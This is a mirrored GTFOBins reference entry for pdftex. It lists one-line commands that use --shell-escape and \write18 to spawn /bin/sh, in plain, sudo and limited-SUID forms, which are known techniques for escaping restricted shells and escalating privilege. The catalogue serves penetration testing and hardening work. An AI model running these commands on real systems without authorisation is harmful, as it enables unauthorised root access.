1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-16 17:01:38 +02:00
GTFOBins.github.io/_gtfobins/pdftex.md

13 lines
263 B
Markdown
Raw Permalink Normal View History

---
2021-04-22 22:13:29 +02:00
functions:
shell:
- code: |
pdftex --shell-escape '\write18{/bin/sh}\end'
2021-04-22 22:13:29 +02:00
sudo:
- code: |
sudo pdftex --shell-escape '\write18{/bin/sh}\end'
limited-suid:
- code: |
./pdftex --shell-escape '\write18{/bin/sh}\end'
---